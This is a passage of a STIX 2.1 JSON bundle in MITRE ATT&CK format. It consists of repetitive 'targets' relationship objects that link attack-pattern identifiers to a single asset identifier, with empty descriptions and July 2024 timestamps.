"x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b8dbb559-6cc0-409c-a42b-b3a0b2508aad", "created": "2024-07-01T10:37:15.839293", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839295", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d791ba26-35f7-45f0-adae-8eaa8fdab258", "created": "2024-07-01T10:37:15.839302", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839304", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a15dd67b-0c78-4e84-a850-44a9ef1d1b05", "created": "2024-07-01T10:37:15.839311", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839313", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf2aa5b2-2ac4-4f86-b26d-893481a484a5", "created": "2024-07-01T10:37:15.839320", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839322", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4050e4f7-ee14-4766-81af-a65391e6a8d0", "created": "2024-07-01T10:37:15.839330", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839331", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e452d4a-5236-46a2-ac29-e1f48bbc0d48", "created": "2024-07-01T10:37:15.839339", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839341", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e255016-953e-45aa-a647-5c0833a2e42c", "created": "2024-07-01T10:37:15.839348", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839350", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bae769b7-29dc-4a95-939d-b8bfd4b492e6", "created": "2024-07-01T10:37:15.839357", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839359", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--466c841f-2c24-4a9a-b664-465af87bc3a9", "created": "2024-07-01T10:37:15.839366", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839368", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--03fce2b7-e75e-4882-957a-a334ba181c61", "created": "2024-07-01T10:37:15.839376", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839378", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7d5f46b5-0e5f-47e0-895f-94110d128ac9", "created": "2024-07-01T10:37:15.839385", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839387", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2bce02bc-c056-4d9f-bc58-9af519fde1ee", "created": "2024-07-01T10:37:15.839394", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839396", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d164d793-c7de-45a6-9237-a0bfedeac818", "created": "2024-07-01T10:37:15.839403", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839405", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b72fe54d-e0a6-47d5-9145-1eb314bd4da7", "created": "2024-07-01T10:37:15.839412", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839414", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ca9a93f4-9160-4094-91a5-fae88d498f4e", "created": "2024-07-01T10:37:15.839421", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839423", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--258b97fe-4f65-4937-895c-cfb05b2c0782", "created": "2024-07-01T10:37:15.839430", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839432", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dfac1a78-6000-4378-b380-e2b7ae523026", "created": "2024-07-01T10:37:15.839439", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839441", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d989efa1-562b-4d8e-b1b2-0eed840d226c", "created": "2024-07-01T10:37:15.839448", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839450", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c07c26ee-e201-490b-804c-1e56ad27378f", "created": "2024-07-01T10:37:15.839457", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839459", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dbf02f0e-8389-480b-89e5-dc136e89f5d5", "created": "2024-07-01T10:37:15.839467", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839469", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1a1dee30-1d1a-45bf-bf2e-4ab36c05f36d", "created": "2024-07-01T10:37:15.839476", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839478", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--38531239-712b-4046-9cfa-7aebf9b6c75d", "created": "2024-07-01T10:37:15.839485", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839487", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91d6c002-3e11-4f3e-80f2-b0d4c9b11cdb", "created": "2024-07-01T10:37:15.839494", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839496", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46bf9446-f55a-4a8b-98df-1719a86c6fcf", "created": "2024-07-01T10:37:15.839503", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839505", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bbc26dfa-e235-4413-8d6b-a85d394571b4", "created": "2024-07-01T10:37:15.839512", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839514", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--51b08013-2542-4fd1-a7cc-03757f4a4e2e", "created": "2024-07-01T10:37:15.839521", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839523", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--75bf79ac-3951-4782-99e7-a853bad135f9", "created": "2024-07-01T10:37:15.839530", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839532", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--668e62e5-298c-47b4-908a-511ba6c14d3d", "created": "2024-07-01T10:37:15.839539", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839541", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--45126ac2-0dae-4010-b3cb-25efceda1249", "created": "2024-07-01T10:37:15.839548", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839550", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fdc88cca-3a80-482e-bd8f-54690d212da9", "created": "2024-07-01T10:37:15.839557", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839559", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--88fc2f01-1443-4e25-ac0a-34dee26ff02c", "created": "2024-07-01T10:37:15.839566", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839568", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--90579f85-3a55-4ca1-a602-e488ff0829b8", "created": "2024-07-01T10:37:15.839575", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839577", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--10aabfd3-581a-44ec-aa2a-8b43496c6e5a", "created": "2024-07-01T10:37:15.839585", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839587", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a6b71aa1-db0b-4ddb-ad56-15fd24fb61ea", "created": "2024-07-01T10:37:15.839594", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839596", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--03558776-2f50-49f8-9a5c-7e3a8e631953", "created": "2024-07-01T10:37:15.839603", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839605", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--62ce2244-b51d-432c-87bb-d9985a4fd8ed", "created": "2024-07-01T10:37:15.839612", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839614", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46538050-84a4-404f-acc1-cecc2d90521d", "created": "2024-07-01T10:37:15.839622", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839624", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d916271c-3621-4cf5-ba60-e4da75194434", "created": "2024-07-01T10:37:15.839631", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839633", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--29eff47b-cabc-4a9e-8917-6138bd9ff1ee", "created": "2024-07-01T10:37:15.839640", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839642", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2a4d9683-85b6-4234-900d-7821f76cf026", "created": "2024-07-01T10:37:15.839649", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839651", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84452677-eaa0-438e-9bc5-0d399790aea0", "created": "2024-07-01T10:37:15.839658", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839660", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", 